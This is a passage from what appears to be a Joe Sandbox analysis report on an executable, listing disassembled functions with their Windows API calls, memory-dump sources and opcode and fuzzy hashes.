                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004609BD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                                                                                                                                                                                                                                                                                                                • GetFocus.USER32 ref: 004609EF
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                                                                                                                                                                                                                                                                                                                                                                • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                                                                                                                                                                                                                                                                                                                                                                • __swprintf.LIBCMT ref: 00460A7A
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %s%d
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 991886796-1110647743
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040F790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memset$_sprintf
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %02X
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 891462717-436463671
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0040F3B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • _memset.LIBCMT ref: 0042CD00
                                                                                                                                                                                                                                                                                                                                                                                                                • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\AENiBH7X1q.exe,?,C:\Users\user\Desktop\AENiBH7X1q.exe,004A8E80,C:\Users\user\Desktop\AENiBH7X1q.exe,0040F3D2), ref: 0040FFCA
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: $OH$@OH$X
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3491138722-1394974532
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00463D7E Relevance: 7.6, APIs: 5, Instructions: 141libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                                                                                                                                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                                                                                                                                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: AddressProc$Library$FreeLoad
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2449869053-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044C379 Relevance: 7.6, APIs: 5, Instructions: 137windowkeyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                                                                                                                                                                                                                                                                                                                                                • SendInput.USER32 ref: 0044C509
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: KeyboardMessagePostState$InputSend
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3031425849-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 004422B9 Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                                                                                                                                                                                                                                                                                                                                                                • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                                                                                                                                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                                                                                                                                                                                                                                                                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                                                                                                                                                                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Enum$CloseDeleteOpen
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2095303065-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0045C277 Relevance: 7.6, APIs: 5, Instructions: 105COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                                                                                                                                                                                                                                                                                                                                                                • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                                                                                                                                                                                                                                                                                                                                                                • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                                                                                                                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                                                                                                                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00318675240305ABD610DFA1DC85F9BB3A8AF84705F00891DF94497292D7B9E889CB94
                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044796B Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00447997
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004479A2
                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004479BE
                                                                                                                                                                                                                                                                                                                                                                                                                • WindowFromPoint.USER32(?,?), ref: 004479FF
                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447A78
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1822080540-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e9c1e18ea4fcc9a2ad4b32cd349e8b57ec7287094a91df3c43d19f1875151664
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c356f0f93048ebf3c0a873f2be17aa192b5fb9472fb724aa4a6a449873fe30ba
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE3188742082029BD710CF19D88596FB7A9EBC8714F144A1EF88097291D778EA57CBAA
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00447BAF Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00447C1B
                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00447C39
                                                                                                                                                                                                                                                                                                                                                                                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C4C
                                                                                                                                                                                                                                                                                                                                                                                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447C93
                                                                                                                                                                                                                                                                                                                                                                                                                • EndPaint.USER32(?,?), ref: 00447CD1
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 659298297-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 653bb342b0117225c29b14224c0e663a7b864e912777eddc33bb147bcfad3e12
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a6d698a2242c6caf7091173c4181dadfabb51550506680b35635a03376f271bc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A3150706043019FE320CF15D9C8F7B7BE8EB89724F044A6EF994873A1D774A8468B69
                                                                                                                                                                                                                                                                                                                                                                                                                Function 00447870 Relevance: 7.6, APIs: 5, Instructions: 94windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004478A7
                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478C3
                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?,004A83D8,?,004A83D8,?), ref: 004478E7
                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 00447935
                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 0044795B
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
